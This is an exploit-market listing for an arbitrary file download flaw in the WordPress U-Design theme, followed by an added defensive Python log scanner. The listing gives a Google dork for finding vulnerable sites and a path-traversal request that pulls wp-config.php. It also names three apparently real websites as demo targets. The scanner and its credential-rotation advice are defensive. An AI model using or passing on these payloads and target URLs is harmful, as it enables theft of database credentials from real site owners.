0day Today Exploits Market and 0day Exploits Database

Wordpress Theme U-Design Arbitrary File Download Vulnerability

Author: terrorist
Risk: Security Risk High
0day-ID: 0day-ID-23143
Category: web applications
Date add: 18-01-2015
Platform: php
######################
# Exploit Title: Wordpress Theme U-Design Arbitrary File Download Vulnerability
# Date: 18/01/2015
# Exploit Author: t3rr0rist - GHC (Georgian Hacking Community) team
# Contact : mrinjector17@gmail.com
# Tested on: Linux
# Google Dork: inurl:"wp-content/themes/u-design/"
######################
  
# Proof of Concept

http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 

# Demo

http://inuitartfoundation.org/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://neadkolor.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.kingstonphoenixgroup.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
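
Added example, not part of the original advisory: a web access log check for the request pattern in the proof of concept above. It flags admin-ajax.php requests with action=revslider_show_image whose img parameter carries a traversal segment, an absolute path, or a non-image file; the combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".webp", ".bmp", ".svg")

def classify_request(target):
    """Return a reason string if the request matches the PoC pattern, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "revslider_show_image" not in params.get("action", []):
        return None
    for raw in params.get("img", []):
        # parse_qs decodes once; normalise percent-encoding again before checking
        value = unquote(raw).replace("\\", "/")
        if ".." in value.split("/"):
            return "path traversal in img"
        if value.startswith("/"):
            return "absolute path in img"
        if not value.lower().endswith(IMAGE_EXTS):
            return "non-image file requested via img"
    return None

def scan(lines):
    """Yield (line_number, reason, request_target) for suspicious entries."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            reason = classify_request(m.group(1))
            if reason:
                yield n, reason, m.group(1)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38"',
    '198.51.100.7 - - [18/Jan/2015:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/01/banner.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Jan/2015:10:00:03 +0000] "GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.38"',
    '198.51.100.9 - - [18/Jan/2015:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 57 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, reason, target in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: {target}")
```

A 200 response on a flagged line means wp-config.php may have been served; rotate the database credentials and the keys and salts stored in it.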

#  0day.today [2024-10-06]  #